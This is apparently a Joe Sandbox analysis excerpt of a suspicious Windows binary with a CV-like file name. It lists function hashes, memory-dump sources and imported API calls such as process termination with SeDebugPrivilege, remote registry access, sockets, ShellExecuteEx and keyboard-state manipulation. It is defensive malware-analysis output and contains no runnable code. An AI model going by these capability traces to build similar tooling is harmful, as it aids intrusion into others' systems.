                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memset
                                                                                            • String ID: Q\E$[$\$\$]$^
                                                                                            • API String ID: 2102423945-1026548749
                                                                                            • Opcode ID: bb625bfb1d2ab3d78676e0908017fa68e25911fe41e31edb887c3086064d21db
                                                                                            • Instruction ID: f999e7bcf4b4d477334654436a071fc516c80f80a7ed94159c2c3890602a4920
                                                                                            • Opcode Fuzzy Hash: bb625bfb1d2ab3d78676e0908017fa68e25911fe41e31edb887c3086064d21db
                                                                                            • Instruction Fuzzy Hash: F2515E71D002199BCF64CF99C881BEDB7B2BF98314F28816ED818B7351E7309D858B95
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00129B19
                                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00129B2D
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00129B47
                                                                                            • _wcscat.LIBCMT ref: 00129BA2
                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00129BB9
                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00129BE7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window_wcscat
                                                                                            • String ID: SysListView32
                                                                                            • API String ID: 307300125-78025650
                                                                                            • Opcode ID: 94833d9aeac422bb772adae4aa15d7abfc6c83bbcb5be7e37a23e135dea0d7e0
                                                                                            • Instruction ID: f6df36278c7416b36bffdcc5bf1682c5deed785bc096aef7caf357904e599af2
                                                                                            • Opcode Fuzzy Hash: 94833d9aeac422bb772adae4aa15d7abfc6c83bbcb5be7e37a23e135dea0d7e0
                                                                                            • Instruction Fuzzy Hash: 71419175A00358AFDF219FA8EC85FEE77A8EF08350F10442AF549A7291D7719D94CB60
                                                                                            APIs
                                                                                              • Part of subcall function 00106532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00106554
                                                                                              • Part of subcall function 00106532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00106564
                                                                                              • Part of subcall function 00106532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 001065F9
                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012179A
                                                                                            • GetLastError.KERNEL32 ref: 001217AD
                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001217D9
                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00121855
                                                                                            • GetLastError.KERNEL32(00000000), ref: 00121860
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00121895
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                            • String ID: SeDebugPrivilege
                                                                                            • API String ID: 2533919879-2896544425
                                                                                            • Opcode ID: b1eaf5bdc387312b49fc00180cf58f44295736e6f8f2bac17afad328f54ac9fb
                                                                                            • Instruction ID: 641879a84525e071b3776661f476689da666cf3dc6da91dcc6316a152ece11a8
                                                                                            • Opcode Fuzzy Hash: b1eaf5bdc387312b49fc00180cf58f44295736e6f8f2bac17afad328f54ac9fb
                                                                                            • Instruction Fuzzy Hash: B041BB71600211AFDB05EF54D8E5FAEB7A1BF64700F058059F9069F3D2DBB5AA408F91
                                                                                            APIs
                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 001058B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconLoad
                                                                                            • String ID: blank$info$question$stop$warning
                                                                                            • API String ID: 2457776203-404129466
                                                                                            • Opcode ID: e0b0a82ff692a0227020e963e4f3e02eca3d57538a9e7fbfdf41dcfb92d30d6e
                                                                                            • Instruction ID: 84a4ed5447ae8075104ccdf855a223a510e44261a5daad657c2e8828b04b9244
                                                                                            • Opcode Fuzzy Hash: e0b0a82ff692a0227020e963e4f3e02eca3d57538a9e7fbfdf41dcfb92d30d6e
                                                                                            • Instruction Fuzzy Hash: CC112735709746BEE7046A569C82DAB33ADDF15324B20803BF994A66C2F7E0AA404A64
                                                                                            APIs
                                                                                            • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0010A806
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ArraySafeVartype
                                                                                            • String ID:
                                                                                            • API String ID: 1725837607-0
                                                                                            • Opcode ID: c0eb764764327cf700e59e8adf1da0ab0e8ef8075178bbd8c7cff16d8e990fa3
                                                                                            • Instruction ID: afe21cb26671ece5f38becf4aed5f7ee8e8c12110f322da92b632e0c41b9a79b
                                                                                            • Opcode Fuzzy Hash: c0eb764764327cf700e59e8adf1da0ab0e8ef8075178bbd8c7cff16d8e990fa3
                                                                                            • Instruction Fuzzy Hash: 94C19D75A0030ADFDB04CF94D481BAEB7F4FF08315F24846AE686E7291D7B4A941CB91
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00106B63
                                                                                            • LoadStringW.USER32(00000000), ref: 00106B6A
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00106B80
                                                                                            • LoadStringW.USER32(00000000), ref: 00106B87
                                                                                            • _wprintf.LIBCMT ref: 00106BAD
                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00106BCB
                                                                                            Strings
                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00106BA8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                            • API String ID: 3648134473-3128320259
                                                                                            • Opcode ID: 44d040ee2d0f826054398daea3b64578fc48fe6caf83a2a795ac6b711275d6da
                                                                                            • Instruction ID: a711c0a4aad7ccd5b254df5c10eafcf2b1d559945ad34cdf602932c481468dbe
                                                                                            • Opcode Fuzzy Hash: 44d040ee2d0f826054398daea3b64578fc48fe6caf83a2a795ac6b711275d6da
                                                                                            • Instruction Fuzzy Hash: 0F0186F6500208BFEB11A794AD89EFB337CD704305F004491B745E6551EA749EC48F71
                                                                                            APIs
                                                                                              • Part of subcall function 00123C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00122BF6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharConnectRegistryUpper
                                                                                            • String ID:
                                                                                            • API String ID: 2595220575-0
                                                                                            • Opcode ID: ce264b3de1f2664caad4f8e9170b33982d1aea8667f053367b1a10033ea53a9f
                                                                                            • Instruction ID: 726ff71685a7b2e807d989eb58ecc6ce7454480258068670088d02e30450f469
                                                                                            • Opcode Fuzzy Hash: ce264b3de1f2664caad4f8e9170b33982d1aea8667f053367b1a10033ea53a9f
                                                                                            • Instruction Fuzzy Hash: D3916675204211AFCB14EF94D881FAEB7E5BF98310F04881DF996972A2DB34ED55CB82
                                                                                            APIs
                                                                                            • select.WSOCK32 ref: 00119691
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0011969E
                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?), ref: 001196C8
                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001196E9
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 001196F8
                                                                                            • htons.WSOCK32(?), ref: 001197AA
                                                                                            • inet_ntoa.WSOCK32(?), ref: 00119765
                                                                                              • Part of subcall function 000FD2FF: _strlen.LIBCMT ref: 000FD309
                                                                                            • _strlen.LIBCMT ref: 00119800
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                            • String ID:
                                                                                            • API String ID: 3480843537-0
                                                                                            • Opcode ID: f2e62a67102ccd6209410e5015a8166b9e5c8c69c6939beec4bb4708fabcbfa5
                                                                                            • Instruction ID: 117455f809a955dff6d12cee61dd3c9a8811004f5e488d3e95951d5633bf3296
                                                                                            • Opcode Fuzzy Hash: f2e62a67102ccd6209410e5015a8166b9e5c8c69c6939beec4bb4708fabcbfa5
                                                                                            • Instruction Fuzzy Hash: BD81E031504200ABD718EF64DC95FAFB7A8EF85714F10462EF5659B2A2EB30DD44CBA2
                                                                                            APIs
                                                                                            • __mtinitlocknum.LIBCMT ref: 000EA991
                                                                                              • Part of subcall function 000E7D7C: __FF_MSGBANNER.LIBCMT ref: 000E7D91
                                                                                              • Part of subcall function 000E7D7C: __NMSG_WRITE.LIBCMT ref: 000E7D98
                                                                                              • Part of subcall function 000E7D7C: __malloc_crt.LIBCMT ref: 000E7DB8
                                                                                            • __lock.LIBCMT ref: 000EA9A4
                                                                                            • __lock.LIBCMT ref: 000EA9F0
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00176DE0,00000018,000F5E7B,?,00000000,00000109), ref: 000EAA0C
                                                                                            • EnterCriticalSection.KERNEL32(8000000C,00176DE0,00000018,000F5E7B,?,00000000,00000109), ref: 000EAA29
                                                                                            • LeaveCriticalSection.KERNEL32(8000000C), ref: 000EAA39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                            • String ID:
                                                                                            • API String ID: 1422805418-0
                                                                                            • Opcode ID: 07cce34a1c346baf3d2ec875401a04385b93aa2e46420b7a5f5dea2b221cd410
                                                                                            • Instruction ID: 133a28eba73e42d4102cadb6aa3aa4db5c481c1c0a48910bacf63d6696b50758
                                                                                            • Opcode Fuzzy Hash: 07cce34a1c346baf3d2ec875401a04385b93aa2e46420b7a5f5dea2b221cd410
                                                                                            • Instruction Fuzzy Hash: D2414D71F007859FDB649F6AD94479CB7F06F0A334F154228E429BB2D2D774A944CB82
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(00000000), ref: 00128EE4
                                                                                            • GetDC.USER32(00000000), ref: 00128EEC
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00128EF7
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00128F03
                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00128F3F
                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00128F50
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0012BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00128F8A
                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00128FAA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3864802216-0
                                                                                            • Opcode ID: 0db99c356f8b3ccac7ddc107c0a7106a54bcba5153f20e76e32d290856786669
                                                                                            • Instruction ID: ec4c0bb984563430e54bc9855b062d6607b94f6fae6e23008e538b61352e1fea
                                                                                            • Opcode Fuzzy Hash: 0db99c356f8b3ccac7ddc107c0a7106a54bcba5153f20e76e32d290856786669
                                                                                            • Instruction Fuzzy Hash: 84318D76201224BFEF108F50EC49FEA3BA9EF4A715F054065FE089A1A1D7759851CB70
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                              • Part of subcall function 000DC6F4: _wcscpy.LIBCMT ref: 000DC717
                                                                                            • _wcstok.LIBCMT ref: 0011184E
                                                                                            • _wcscpy.LIBCMT ref: 001118DD
                                                                                            • _memset.LIBCMT ref: 00111910
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                            • String ID: X
                                                                                            • API String ID: 774024439-3081909835
                                                                                            • Opcode ID: 7db25e533e1991edb5e2c8b49c556f6dd3cf9a9fcd7cad680c031f4e62525613
                                                                                            • Instruction ID: aa389b62b5ff88b9332606eb1f2b3f16442156f0b8c1bd40d9630649b56f6de4
                                                                                            • Opcode Fuzzy Hash: 7db25e533e1991edb5e2c8b49c556f6dd3cf9a9fcd7cad680c031f4e62525613
                                                                                            • Instruction Fuzzy Hash: D3C16C35508340AFC728EF64C891E9EB7E4BF95350F04492DF999972A2DB30ED45CB82
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0013016D
                                                                                            • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0013038D
                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001303AB
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?), ref: 001303D6
                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001303FF
                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00130421
                                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00130440
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                            • String ID:
                                                                                            • API String ID: 3356174886-0
                                                                                            • Opcode ID: 89952709f1670ba81083131c484ad92767fb68c4c28b1fdbb04f8233473f6952
                                                                                            • Instruction ID: f9ce53d8005a498b2298f946bb1f224a8bcbb6d341c42f67050b5e3f18177f24
                                                                                            • Opcode Fuzzy Hash: 89952709f1670ba81083131c484ad92767fb68c4c28b1fdbb04f8233473f6952
                                                                                            • Instruction Fuzzy Hash: 07A1AE35600616EFDB19CF68C9957BEBBF1BF08740F158115EC58AB290D774ADA0CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 604644902da2ba3c62cdd01b26184f9a87e74c2b2c116305bcac13a34a00dce1
                                                                                            • Instruction ID: 2f0b1cddb8b3d702e2ab0a34505a5f625fcf5544e1c1dbea450a40c3e9102b62
                                                                                            • Opcode Fuzzy Hash: 604644902da2ba3c62cdd01b26184f9a87e74c2b2c116305bcac13a34a00dce1
                                                                                            • Instruction Fuzzy Hash: BF713CB1A00209EFCB14CF98CC49AAEBBB5FF86314F14819AF915A7351C7349A51CF65
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 0012225A
                                                                                            • _memset.LIBCMT ref: 00122323
                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00122368
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                              • Part of subcall function 000DC6F4: _wcscpy.LIBCMT ref: 000DC717
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0012242F
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0012243E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                            • String ID: @
                                                                                            • API String ID: 4082843840-2766056989
                                                                                            • Opcode ID: 93e358ef945be3a079464c97413b7cc0da211d857f147cd5a903308c08ffb502
                                                                                            • Instruction ID: 34d5662969d9b1144bf69b69386f9a0591e0ef3385f37eac7c3e9e38db050ce8
                                                                                            • Opcode Fuzzy Hash: 93e358ef945be3a079464c97413b7cc0da211d857f147cd5a903308c08ffb502
                                                                                            • Instruction Fuzzy Hash: DC716F74A00629EFCF05EFA4D885AAEB7F5FF48310F108459E855AB352DB34AE50CB94
                                                                                            APIs
                                                                                            • GetParent.USER32(00000000), ref: 00103C02
                                                                                            • GetKeyboardState.USER32(?), ref: 00103C17
                                                                                            • SetKeyboardState.USER32(?), ref: 00103C78
                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00103CA4
                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00103CC1
                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00103D05
                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00103D26
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                            • String ID:
                                                                                            • API String ID: 87235514-0
                                                                                            • Opcode ID: 5badb3900a38cd9ae4e70e1893afd39be032011404379fd37d092bf0a244f9b6
                                                                                            • Instruction ID: b62c4b151285444a8661cdbd74dbe72f1b03290f4e386acb08d0e855419e5874
                                                                                            • Opcode Fuzzy Hash: 5badb3900a38cd9ae4e70e1893afd39be032011404379fd37d092bf0a244f9b6
                                                                                            • Instruction Fuzzy Hash: 4E5105B05447D53DFB3283748C45BB6BFAD6B06304F088489E1E99A8D2D7D5EE84E760
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00128FE7
                                                                                            • GetWindowLongW.USER32(0192DE60,000000F0), ref: 0012901A
                                                                                            • GetWindowLongW.USER32(0192DE60,000000F0), ref: 0012904F
                                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00129081
                                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001290AB
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 001290BC
                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001290D6
                                                                                            Memory Dump Source
